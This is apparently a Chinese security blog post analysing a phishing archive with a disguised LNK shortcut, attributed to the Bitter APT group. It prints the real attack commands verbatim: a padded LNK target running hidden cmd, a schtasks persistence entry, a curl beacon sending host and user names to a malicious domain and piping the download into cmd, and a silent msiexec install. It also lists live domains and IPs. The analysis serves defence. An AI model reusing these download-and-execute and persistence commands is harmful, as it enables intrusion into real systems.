本次事件为某单位对外接稿公共邮箱遭受恶意投递远控木马钓鱼，相关业务人员缺乏安全意识，直接点击了木马，导致个人终端被控，从邮件标题以及正文来看，攻击者非常专业，使用的话术与行业从业人员极像，使业务人员大大降低了警惕性。

    邮件附件为压缩包，压缩包中的木马为lnk快捷方式木马，针对邮件附件中的木马进行分析，使用7z打开压缩包后，内容如下

使用win自带的解压工具是无法看到隐藏文件的

其中存在两个隐藏文件，分别为

~tmp.pdf:Participation~tmp.pdf:Zoneicipation

直接解压出来后，只能看到lnk快捷方式文件以及pdf文件的，这里其实看起来就很有迷惑性了。如果不是安全人员可能确实解压直接点了。

这里lnk快捷方式文件为主要木马文件，我们优先分析这个文件，右键点击属性

目标一栏这里使用了字符填充，使其点击属性无法第一时间看到目标一栏的内容，攻击者将此处更改为了

C:Windowssystem32conhost.exe          （一堆填充）

攻击者将文件lnk快捷方式中的目标字段内容进行更改，由于参数太长，使用010 Editor进行查看

完整如下

C:Windowssystem32conhost.exe    --headless cmd /k "cmd < ~tmp.pdf:Participation & exit"

在C:Windowssystem32conhost.exe后面使用不可见字符来填充，导致在点击文件属性时不能一眼看到此处的更改，先看到的是空白，达到混淆视听的效果，使用cmd执行了~tmp.pdf:Participation文件中的内容，此文件为前文中出现的隐藏文件，打开此文件查看内容

发现文件内容为一条恶意的powershell命令，将命令解码后查看

发现使用powershell执行了如下命令

此命令意思为start打开一个名为～tmp.pdf的文件，这就是为什么点击恶意lnk木马之后会打开正常的pdf，就是因为start ～tmp.pdf这条命令。

随后使用schtasks命令添加Windows计划任务，schtasks /create /sc minute /mo 17 /tn "DsSvcCleanup"命令为指创建一个名为DsSvcCleanup的计划任务，每17分钟执行一次这个任务。

此任务会执行如下命令，命令为

--headless cmd /c curl -o C:UsersPublicmusicjr.jp jacknwoods.com/jacds.php?jin=%computername%_%username% & more C:UsersPublicmusicjr.jp | cmd /f"

此命令会使用curl命令将计算机名和用户名提交给域名jacknwoods.com随后下载一个文件，将文件保存在C:UsersPublicmusic目录下并命名为jr.jp，随后使用more命令读取文件内容，然后使用cmd执行。

查看系统windows计划任务

查看完整具体执行的命令

Conhost --headless cmd /c curl -o  C:UsersPublicmusicjr.jp jacknwoods.com/jacds.php?jin=%computername%_%username% &  more C:UsersPublicmusicjr.jp|cmd /f

通信的恶意域名为jacknwoods.comip地址为185.244.151.84

查看下载的文件

这里其实去下载的时候发现，文件并不能下载成功，jr.jp内容为空。

在发现攻击者使用curl命令去请求jacknwoods.com时，携带了当前主机的用户名和主机名，盲猜是通过web访问日志，筛选出高价值目标，进行二阶段木马下发，所以大家可以看到我的Wireshark图中请求包中的用户名，直接一手研究院简写yjy-xxx，用于迷惑攻击者，随后关机坐等

终于在第二天下午，开机后，成功获取到二阶段木马

查看木马内容

恶意命令为下载winycx.msi文件并且静默安装

msiexec /i https://www.jacknwoods.com/winycx.msi /qn

下载此木马查看

执行此木马后，发现进程msiexec中的子进程MSIA9B5.tmp，进行外部通讯，通讯ip为96.9.215.155

MSIA9B5.tmp通讯详情

木马执行流程如下

针对出现的样本、域名、ip地址进行溯源分析，开源情报平台查询发现关联APT组织为Bitter团伙，为非常活跃的APT组织。

Lnk木马云沙箱运行分析如下

二阶段木马

二阶段下载木马的域名www.jacknwoods.com以及ip地址185.244.151.84

木马通讯的域名samsnewlooker.com以及ip地址96.9.215.155

APT组织 Bitter（又称APT-C-08、蔓灵花）是一个疑似具有南亚背景（可能与印度有关）的活跃黑客团伙，自2013年起持续针对中国、巴基斯坦等国家的政府、军事、能源、外交等领域发起定向攻击。其攻击行为具有高度政治动机，常以窃取敏感数据和长期潜伏为目标。

攻击者的攻击过程如下

  我们发现攻击者从邮件制作的专业性，一直到控制受害者终端，整个过程非常专业，从防守角度看，应加强员工安全意识，做好内外网隔离，及时更新补丁，定期修改常用软件以及终端的密码。

END

关于文章/Tools获取方式:请关注交流群或者知识星球。

关于交流群：因为某些原因，更改一下交流群的获取方式:

1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。  

关于知识星球的获取方式:

1.后台回复发送 "知识星球"，即可获取知识星球二维码。

2如若上述方式不行，请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。

团队介绍

高级攻防小组,

5年以上一线攻击选手,每年30场+，成绩均占比前10%。部/省/市/行业

src第一，混迹于各种众测。

多个红队平台等。

实战派，一切为了实战。

后台回复"红队",进入实战派红队的小白交流群。后台回复"交流群",进入闲聊的小白交流群。

承接红蓝对抗,安全众测,安全培训,SRC培训,代码审计,渗透测试,应急响应,免杀等.

(安全可靠,排名稳定,战绩可查.)

星梦计划招生ing中.实战src的全方位讲解.‍‍‍‍‍‍‍‍

原文始发于微信公众号（极梦C）：lnk快捷方式钓鱼样本分析 (APT-C-08 蔓灵花 )